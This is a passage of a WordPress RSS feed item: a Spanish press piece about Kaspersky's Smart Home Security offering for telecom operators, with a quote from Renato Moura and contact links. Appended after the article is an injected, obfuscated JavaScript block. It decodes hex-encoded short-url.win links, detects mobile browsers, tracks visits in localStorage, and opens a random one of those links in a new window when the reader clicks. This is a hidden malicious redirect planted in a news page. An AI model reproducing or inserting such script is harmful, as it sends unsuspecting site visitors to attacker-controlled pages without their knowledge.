<!-- wp:paragraph -->
<p><em>“Nuestra nueva oferta es el resultado de muchos años de trabajo exitoso con operadores de todo el mundo. Conocemos los desafíos que enfrentan nuestros socios de telecomunicaciones a medida que surgen nuevas tecnologías. El nuevo producto protegerá a los usuarios y detallará los niveles de protección actuales del ecosistema de IoT doméstico. El operador también necesita usar los dispositivos CPE ya implementados en los modos de los clientes, y estas demandas se han tenido en cuenta durante el desarrollo de la solución</em>”, comenta <strong>Renato Moura, director de proyectos xSP para América Latina en Kaspersky</strong>. &nbsp;</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para obtener información adicional y detalles del producto, comuníquese con <a href="mailto:vas@kaspersky.com">vas@kaspersky.com</a>.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Más información sobre la oferta VAS de Kaspersky para telecomunicaciones y Kaspersky Smart Home Security está disponible a través de <a href="https://www.kaspersky.com/partners/vas">este enlace</a>.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/kaspersky-smart-home-security-nuevo-producto-de-kaspersky-para-proteger-los-dispositivos-conectados-en-el-hogar/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">93409</post-id>	</item>
	</channel>
</rss>
